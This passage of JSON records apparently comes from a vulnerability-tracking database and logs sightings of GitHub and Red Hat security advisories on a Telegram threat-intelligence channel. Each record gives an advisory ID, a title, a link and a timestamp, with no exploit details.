"2024-02-26T14:42:07.000000Z"}, {"uuid": "e32874d5-4a42-4e9e-afda-4bb56a44575c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0982", "type": "seen", "source": "https://t.me/ctinow/193249", "content": "https://ift.tt/LepWS4A\nRHSA-2024:0982: Important: unbound security update", "creation_timestamp": "2024-02-26T11:16:25.000000Z"}, {"uuid": "e7e2d5c7-b2bc-4db0-8881-50a322a13132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0553", "type": "seen", "source": "https://t.me/ctinow/193398", "content": "https://ift.tt/RmiwPC3\nCVE-2019-11291 | Pivotal RabbitMQ up to 3.7.19/3.8.0 Policy Management cross site scripting (RHSA-2020:0553)", "creation_timestamp": "2024-02-26T15:11:42.000000Z"}, {"uuid": "3326e41a-b425-4ef6-be9d-a197fcafd326", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H2FJ-7R3M-7GF2", "type": "seen", "source": "https://t.me/ctinow/189511", "content": "https://ift.tt/6a8bOFs\nCVE-2024-0212 | Cloudflare Plugin up to 4.12.2 on Wordpress API access control (GHSA-h2fj-7r3m-7gf2)", "creation_timestamp": "2024-02-21T12:11:19.000000Z"}, {"uuid": "805aac7d-96a2-4926-b112-a0cc1430b8d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VGV8-5CPJ-QJ2F", "type": "seen", "source": "https://t.me/ctinow/189959", "content": "https://ift.tt/2x6Bw5T\n[GHSA-vgv8-5cpj-qj2f] pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string", "creation_timestamp": "2024-02-21T19:16:56.000000Z"}, {"uuid": "57be0fb6-7911-4bdb-b373-58f25dfadb81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37GX-JQX9-FWMG", "type": "seen", "source": "https://t.me/ctinow/189096", "content": "https://ift.tt/v5W8yFb\n[GHSA-37gx-jqx9-fwmg] Improper Certificate Validation in Apache DolphinScheduler", "creation_timestamp": "2024-02-21T01:26:17.000000Z"}, {"uuid": "54d114eb-8209-40df-94a1-603ae53daef6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QWXX-XWW6-8Q8M", "type": "seen", "source": "https://t.me/ctinow/189095", "content": "https://ift.tt/u71dnqr\n[GHSA-qwxx-xww6-8q8m] Remote Code Execution in Apache Dolphinscheduler", "creation_timestamp": "2024-02-21T01:26:16.000000Z"}, {"uuid": "63dd9cbd-6009-472e-ae1b-be3a042ae6d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-CCF5-PHJ5", "type": "seen", "source": "https://t.me/ctinow/189065", "content": "https://ift.tt/S6sdBJK\n[GHSA-4265-ccf5-phj5] Apache Commons Compress: OutOfMemoryError unpacking broken Pack200 file", "creation_timestamp": "2024-02-21T01:06:50.000000Z"}, {"uuid": "daa8c7a3-1b18-4e22-9802-bf29cd7dd739", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JJQ-8CVJ-V6M9", "type": "seen", "source": "https://t.me/ctinow/189064", "content": "https://ift.tt/VeWOxD9\n[GHSA-5jjq-8cvj-v6m9] Cross-site Scripting in Serenity", "creation_timestamp": "2024-02-21T01:06:49.000000Z"}, {"uuid": "5aaa71b5-e3cc-4550-bb36-e943f1a4fee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0078", "type": "seen", "source": "https://t.me/ctinow/193377", "content": "https://ift.tt/dbCKExi\nCVE-2019-11287 | Pivotal RabbitMQ up to 3.7.20/3.8.0 Web Management Plugin HTTP Header resource consumption (RHSA-2020:0078)", "creation_timestamp": "2024-02-26T14:42:11.000000Z"}, {"uuid": "1a66f517-6c45-42f7-be5d-f57b92ba0dd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0976", "type": "seen", "source": "https://t.me/ctinow/193102", "content": "https://ift.tt/F7QRi0T\nRHSA-2024:0976: Important: firefox security update", "creation_timestamp": "2024-02-26T06:16:11.000000Z"}, {"uuid": "97d4a0c6-58aa-4def-ae89-d2873d61e5e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R275-J57C-7MF2", "type": "seen", "source": "https://t.me/ctinow/188836", "content": "https://ift.tt/vaIPWhf\n[GHSA-r275-j57c-7mf2] Race condition in Endorsements", "creation_timestamp": "2024-02-20T19:16:56.000000Z"}, {"uuid": "d5a6cd5d-309f-437f-b6db-ef0191b174d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3QM-VFC3-JG6V", "type": "seen", "source": "https://t.me/ctinow/188835", "content": "https://ift.tt/MRcj0Y8\n[GHSA-f3qm-vfc3-jg6v] Possible CSRF attack at questionnaire templates preview", "creation_timestamp": "2024-02-20T19:16:55.000000Z"}, {"uuid": "63438801-d2d8-49a8-8d36-1c874397f2f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5VFC-V7HG-PVWM", "type": "seen", "source": "https://t.me/ctinow/189828", "content": "https://ift.tt/2QzLi3m\nCVE-2024-23826 | spbu-se spbu_se_site prior 2024.01.29 on Windows Avatar Image allocation of resources (GHSA-5vfc-v7hg-pvwm)", "creation_timestamp": "2024-02-21T17:36:41.000000Z"}, {"uuid": "edf05e70-4987-473c-a2ce-b5762b1f004a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9VV-FHGV-CJC3", "type": "seen", "source": "https://t.me/ctinow/189162", "content": "https://ift.tt/TGlsdJ5\n[GHSA-c9vv-fhgv-cjc3] agent-js: Insecure Key Generation in `Ed25519KeyIdentity.generate`", "creation_timestamp": "2024-02-21T04:01:24.000000Z"}, {"uuid": "b4e00154-4062-4a70-9165-02a60763d84d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5PM-H33Q-CJRW", "type": "seen", "source": "https://t.me/ctinow/189154", "content": "https://ift.tt/75yql3r\n[GHSA-x5pm-h33q-cjrw] Improper Certificate Validation in apache airflow mongo hook", "creation_timestamp": "2024-02-21T03:41:02.000000Z"}, {"uuid": "3bb2f80d-fda8-453a-9203-bf34d1cf16e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3W6-26F2-P474", "type": "seen", "source": "https://t.me/ctinow/189094", "content": "https://ift.tt/U1tPE2G\n[GHSA-w3w6-26f2-p474] Broken Access Control in Spring Security With Direct Use of isFullyAuthenticated", "creation_timestamp": "2024-02-21T01:26:14.000000Z"}, {"uuid": "ce4768e9-b1ac-42d1-9e19-1cc53f9c2ed6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0889", "type": "seen", "source": "https://t.me/ctinow/188461", "content": "https://ift.tt/SJM3Atk\nRHSA-2024:0889: Moderate: oniguruma security update", "creation_timestamp": "2024-02-20T13:16:40.000000Z"}, {"uuid": "f54c1c80-cee1-4897-88a5-b659a9dab744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QPXM-689R-3849", "type": "seen", "source": "https://t.me/ctinow/193812", "content": "https://ift.tt/S3lnHdf\n[GHSA-qpxm-689r-3849] Apache Camel data exposure vulnerability", "creation_timestamp": "2024-02-26T22:46:37.000000Z"}, {"uuid": "6410538f-769d-4260-b9b0-f9a17f500ed6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V8VJ-CV27-HJV8", "type": "seen", "source": "https://t.me/ctinow/193804", "content": "https://ift.tt/Qu12jGM\n[GHSA-v8vj-cv27-hjv8] LangChain Experimental vulnerable to arbitrary code execution", "creation_timestamp": "2024-02-26T22:16:46.000000Z"}, {"uuid": "388b2385-5f64-4770-a21d-b9fc28efa5ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H9J7-5XVC-QHG5", "type": "seen", "source": "https://t.me/ctinow/193794", "content": "https://ift.tt/4fL3Tyg\n[GHSA-h9j7-5xvc-qhg5] langchain Server-Side Request Forgery vulnerability", "creation_timestamp": "2024-02-26T22:02:14.000000Z"}, {"uuid": "fe0d7cf2-8bc7-42ac-97b8-1066323eefdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3JCV-5F9P-2F2P", "type": "seen", "source": "https://t.me/ctinow/189093", "content": "https://ift.tt/cpf7F64\n[GHSA-3jcv-5f9p-2f2p] Cross-site Scripting in electron-pdf", "creation_timestamp": "2024-02-21T01:26:13.000000Z"}, {"uuid": "a9dac3d0-929d-4f0c-a10d-2e3e364d2169", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P3RV-QJ56-2FQX", "type": "seen", "source": "https://t.me/ctinow/189092", "content": "https://ift.tt/E1kUCca\n[GHSA-p3rv-qj56-2fqx] Cross-site Scripting in Pyhtml2pdf", "creation_timestamp": "2024-02-21T01:26:12.000000Z"}, {"uuid": "38420d95-0b36-42b8-8e07-8f585f1b3c92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2557-X9MG-76W8", "type": "seen", "source": "https://t.me/ctinow/189091", "content": "https://ift.tt/q9TnyhQ\n[GHSA-2557-x9mg-76w8] ASA-2024-002: Default `PrepareProposalHandler` may produce invalid proposals when used with default `SenderNonceMempool`", "creation_timestamp": "2024-02-21T01:26:11.000000Z"}, {"uuid": "e725eab2-c76c-47ea-93eb-f6d116a32bdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4J93-FM92-RP4M", "type": "seen", "source": "https://t.me/ctinow/189090", "content": "https://ift.tt/k8VIL5A\n[GHSA-4j93-fm92-rp4m] ASA-2024-003: Missing `BlockedAddressed` Validation in Vesting Module", "creation_timestamp": "2024-02-21T01:26:10.000000Z"}, {"uuid": "6b4dff2b-5f32-4c86-826c-e43db15c672e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5RWM-2XW8-HH9P", "type": "seen", "source": "https://t.me/ctinow/189089", "content": "https://ift.tt/SDJsapo\n[GHSA-5rwm-2xw8-hh9p] Deserialization of Untrusted Data in Torrentpier", "creation_timestamp": "2024-02-21T01:26:09.000000Z"}, {"uuid": "efc2dfd8-cc49-432c-9508-d0b8144f3ef1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CP68-QRHR-G9H8", "type": "seen", "source": "https://t.me/ctinow/189082", "content": "https://ift.tt/NxEWD2Y\n[GHSA-cp68-qrhr-g9h8] MeshCentral cross-site websocket hijacking (CSWSH) vulnerability", "creation_timestamp": "2024-02-21T01:17:04.000000Z"}, {"uuid": "678a5b61-cb63-490b-abdd-8b3fcb4178fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-375G-39JQ-VQ7M", "type": "seen", "source": "https://t.me/ctinow/189081", "content": "https://ift.tt/nOPJUbY\n[GHSA-375g-39jq-vq7m] Potential buffer overflow in CBOR2 decoder", "creation_timestamp": "2024-02-21T01:17:03.000000Z"}, {"uuid": "ed3b9139-a1f3-4c1d-b254-2a99c74509d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-487G-3M3V-HJHQ", "type": "seen", "source": "https://t.me/ctinow/189080", "content": "https://ift.tt/8SFNY70\n[GHSA-487g-3m3v-hjhq] Uncontrolled Resource Consumption in moodle", "creation_timestamp": "2024-02-21T01:17:02.000000Z"}, {"uuid": "06b5e1a3-403a-4879-8302-8b91730a2243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6VJF-48FH-VXXJ", "type": "seen", "source": "https://t.me/ctinow/189079", "content": "https://ift.tt/W098tby\n[GHSA-6vjf-48fh-vxxj] Improper Handling of Parameters in moodle", "creation_timestamp": "2024-02-21T01:16:58.000000Z"}, {"uuid": "915d81bb-f97a-42b7-a188-c1a114e637bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7PJP-FM93-P6PJ", "type": "seen", "source": "https://t.me/ctinow/189078", "content": "https://ift.tt/JGvV8Kj\n[GHSA-7pjp-fm93-p6pj] Cross-Site Request Forgery in moodle", "creation_timestamp": "2024-02-21T01:16:57.000000Z"}, {"uuid": "ff542e41-578a-4b79-8f3d-fbf66573a506", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VP66-GF7W-9M4X", "type": "seen", "source": "https://t.me/ctinow/189046", "content": "https://ift.tt/VcXFB2T\n[GHSA-vp66-gf7w-9m4x] Insufficient Session Expiration in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T00:56:20.000000Z"}, {"uuid": "309d5a9a-5f31-472f-bc8a-cdb704c8b4eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3Q8-M492-4PWP", "type": "seen", "source": "https://t.me/ctinow/188903", "content": "https://ift.tt/HBDxrY1\n[GHSA-w3q8-m492-4pwp] Possibility to circumvent the invitation token expiry period", "creation_timestamp": "2024-02-20T20:37:33.000000Z"}, {"uuid": "83fa62ee-cdc6-438c-b06f-51873759e481", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0934", "type": "seen", "source": "https://t.me/ctinow/189427", "content": "https://ift.tt/82sFdEV\nRHSA-2024:0934: Important: Red Hat Virtualization security and bug fix update", "creation_timestamp": "2024-02-21T10:16:40.000000Z"}, {"uuid": "8e2b0989-62c3-4972-97fb-4d58f983997b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8XFF-473H-F863", "type": "seen", "source": "https://t.me/ctinow/189070", "content": "https://ift.tt/SuYKoN7\n[GHSA-8xff-473h-f863] Uncaught Exception Handling Parsing Errors on Line Terminators", "creation_timestamp": "2024-02-21T01:16:48.000000Z"}, {"uuid": "5432c1d0-8643-4c2c-888b-2269fc8bafd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7F2V-5877-RX3X", "type": "seen", "source": "https://t.me/ctinow/189063", "content": "https://ift.tt/eJbCnx6\n[GHSA-7f2v-5877-rx3x] Code injection in REDAXO", "creation_timestamp": "2024-02-21T01:06:48.000000Z"}, {"uuid": "c8c0fc31-7941-4c76-a368-5202ed395f16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93X8-66J2-WWR5", "type": "seen", "source": "https://t.me/ctinow/189062", "content": "https://ift.tt/KwUJaMX\n[GHSA-93x8-66j2-wwr5] Server-Side Request Forgery in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T01:06:48.000000Z"}, {"uuid": "1cc98332-6efa-43f2-b383-10d3bc52b1b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0837", "type": "seen", "source": "https://t.me/ctinow/188726", "content": "https://ift.tt/3HT2Dxr\nRHSA-2024:0837: Important: OpenShift Container Platform 4.14.13 security update", "creation_timestamp": "2024-02-20T17:15:42.000000Z"}, {"uuid": "997f4f26-f1ea-496a-9752-ed5349d3d626", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0833", "type": "seen", "source": "https://t.me/ctinow/189140", "content": "https://ift.tt/XIM1uwH\nRHSA-2024:0833: Critical: OpenShift Container Platform 4.12.50 bug fix and security update", "creation_timestamp": "2024-02-21T03:16:16.000000Z"}, {"uuid": "14001ae5-c017-422f-8f3b-cbd8990813d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0845", "type": "seen", "source": "https://t.me/ctinow/189139", "content": "https://ift.tt/pOtRqkP\nRHSA-2024:0845: Critical: OpenShift Container Platform 4.13.34 security update", "creation_timestamp": "2024-02-21T03:16:15.000000Z"}, {"uuid": "ae598e65-e324-4b56-9f45-8b6adbb5c3c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CP8M-H777-G4P3", "type": "seen", "source": "https://t.me/ctinow/189076", "content": "https://ift.tt/8fOansW\n[GHSA-cp8m-h777-g4p3] Improper Access Control in moodle", "creation_timestamp": "2024-02-21T01:16:55.000000Z"}, {"uuid": "aa2c5e9d-911e-4733-ae19-e87276f8194e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFRG-9HPQ-9HVP", "type": "seen", "source": "https://t.me/ctinow/189075", "content": "https://ift.tt/2vUMcW5\n[GHSA-jfrg-9hpq-9hvp] Improper Access Control in moodle", "creation_timestamp": "2024-02-21T01:16:54.000000Z"}, {"uuid": "64f2c068-7ee7-4fb6-aae8-57561b208edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3366-9287-7QPR", "type": "seen", "source": "https://t.me/ctinow/189073", "content": "https://ift.tt/u81cbEp\n[GHSA-3366-9287-7qpr] Path disclosure in JavaScript variable", "creation_timestamp": "2024-02-21T01:16:52.000000Z"}, {"uuid": "8b2b4571-82e5-4030-83c1-fc0cf72c6227", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XFG6-62PX-CXC2", "type": "seen", "source": "https://t.me/ctinow/189074", "content": "https://ift.tt/m451do0\n[GHSA-xfg6-62px-cxc2] SQL injection in pgjdbc", "creation_timestamp": "2024-02-21T01:16:53.000000Z"}, {"uuid": "45d3f1db-9ab4-4130-9b23-71e85fbb85d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q3GG-M8HR-H4X4", "type": "seen", "source": "https://t.me/ctinow/189072", "content": "https://ift.tt/tufacNy\n[GHSA-q3gg-m8hr-h4x4] Externally Controlled Format String in Scripting Functions", "creation_timestamp": "2024-02-21T01:16:50.000000Z"}, {"uuid": "03e08749-9c88-45fb-9fdc-3663efff65dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0222", "type": "seen", "source": "https://t.me/ctinow/188632", "content": "https://ift.tt/iw5OWDv\nCVE-2019-14869 | Ghostscript up to 9.27 .charkeys PostScript File incorrect privileged apis (RHSA-2020:0222)", "creation_timestamp": "2024-02-20T15:51:20.000000Z"}, {"uuid": "ecc9e2ad-1d17-40fa-beb9-6e59bae21411", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0832", "type": "seen", "source": "https://t.me/ctinow/189120", "content": "https://ift.tt/lf9w48m\nRHSA-2024:0832: Critical: OpenShift Container Platform 4.12.50 security and extras update", "creation_timestamp": "2024-02-21T02:16:44.000000Z"}, {"uuid": "e53669e6-24ba-4191-8a9b-ece84f40cb20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0930", "type": "seen", "source": "https://t.me/ctinow/189119", "content": "https://ift.tt/JfkoLIa\nRHSA-2024:0930: Important: kernel security update", "creation_timestamp": "2024-02-21T02:16:43.000000Z"}, {"uuid": "ef696a41-dd9c-4dd7-806d-5e6d67fb6b55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7RW2-3HHP-RC46", "type": "seen", "source": "https://t.me/ctinow/189108", "content": "https://ift.tt/BKDqi0M\n[GHSA-7rw2-3hhp-rc46] Cross-site Scripting Vulnerability in Statement Browser", "creation_timestamp": "2024-02-21T01:41:39.000000Z"}, {"uuid": "5d2b7643-ba5b-424e-9fb8-4edd173ca74f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36XR-4X2F-CFJ9", "type": "seen", "source": "https://t.me/ctinow/189107", "content": "https://ift.tt/zN7MBiV\n[GHSA-36xr-4x2f-cfj9] Deserialization of Untrusted Data in Apache Camel SQL", "creation_timestamp": "2024-02-21T01:41:38.000000Z"}, {"uuid": "b1e2ded0-0491-48c3-99a1-c8583c652bc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M43P-55RF-8C2J", "type": "seen", "source": "https://t.me/ctinow/189106", "content": "https://ift.tt/brvPYXF\n[GHSA-m43p-55rf-8c2j] Deserialization of Untrusted Data in Apache Camel CassandraQL", "creation_timestamp": "2024-02-21T01:41:37.000000Z"}, {"uuid": "47ed1507-0373-40ce-8ad6-ea6d93809e18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF2W-WM48-JHQJ", "type": "seen", "source": "https://t.me/ctinow/189105", "content": "https://ift.tt/7dnf8Q6\n[GHSA-ff2w-wm48-jhqj] Arbitrary File Read Vulnerability in Apache Dolphinscheduler", "creation_timestamp": "2024-02-21T01:41:36.000000Z"}, {"uuid": "c958d058-dc0f-4f8c-a252-d809dbf83c31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJQC-G788-F378", "type": "seen", "source": "https://t.me/ctinow/189104", "content": "https://ift.tt/gxjIEhk\n[GHSA-vjqc-g788-f378] Session Fixation Apache DolphinScheduler", "creation_timestamp": "2024-02-21T01:41:35.000000Z"}, {"uuid": "cc6d1066-c96b-4dd9-b50d-a61fafabd13e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6WR5-JMPR-MJCX", "type": "seen", "source": "https://t.me/ctinow/189071", "content": "https://ift.tt/fZJ4mnW\n[GHSA-6wr5-jmpr-mjcx] Uncaught Exception in Macro Expecting Native Function to Exist", "creation_timestamp": "2024-02-21T01:16:49.000000Z"}, {"uuid": "ed3c9e1d-5efe-44f3-86b0-fd6aac23448c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9R26-5W88-QHP9", "type": "seen", "source": "https://t.me/ctinow/189077", "content": "https://ift.tt/a9hNtYr\n[GHSA-9r26-5w88-qhp9] Authorization Bypass in moodle", "creation_timestamp": "2024-02-21T01:16:56.000000Z"}, {"uuid": "8ad616d5-77b8-45e1-872e-b11e93a2a44e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8H95-JCP5-PJPR", "type": "seen", "source": "https://t.me/ctinow/189050", "content": "https://ift.tt/IXb8xPw\n[GHSA-8h95-jcp5-pjpr] Improper Validation of Array Index in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T00:56:25.000000Z"}, {"uuid": "ab81bf4c-99aa-4dd7-be8b-9ffee9f4f049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C7VF-M394-M4X4", "type": "seen", "source": "https://t.me/ctinow/189049", "content": "https://ift.tt/wsq9Rhr\n[GHSA-c7vf-m394-m4x4] Use of Insufficiently Random Values in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T00:56:24.000000Z"}, {"uuid": "f5981aab-a8f3-4ddb-8f59-aabae05edb22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF72-FF42-C3GW", "type": "seen", "source": "https://t.me/ctinow/189048", "content": "https://ift.tt/CIJNbYW\n[GHSA-ff72-ff42-c3gw] Cross-site Scripting in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T00:56:23.000000Z"}, {"uuid": "c021ccca-9ec6-4883-af14-626576fc0e60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJ36-3CCR-6563", "type": "seen", "source": "https://t.me/ctinow/189047", "content": "https://ift.tt/8zMET7w\n[GHSA-vj36-3ccr-6563] Authentication Bypass by Spoofing in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T00:56:22.000000Z"}, {"uuid": "3f1b52a7-fa29-44a4-9642-1d25c2e600c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0897", "type": "seen", "source": "https://t.me/ctinow/188460", "content": "https://ift.tt/WMgNj5t\nRHSA-2024:0897: Important: kernel security update", "creation_timestamp": "2024-02-20T13:16:39.000000Z"}, {"uuid": "920a4fa5-6828-41af-8da5-5380f9608e68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0903", "type": "seen", "source": "https://t.me/ctinow/188459", "content": "https://ift.tt/CpqMzOw\nRHSA-2024:0903: Moderate: Red Hat AMQ Broker 7.10.6 release and security update", "creation_timestamp": "2024-02-20T13:16:38.000000Z"}, {"uuid": "6ae8768b-0020-4c91-9391-943d23547c6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0879", "type": "seen", "source": 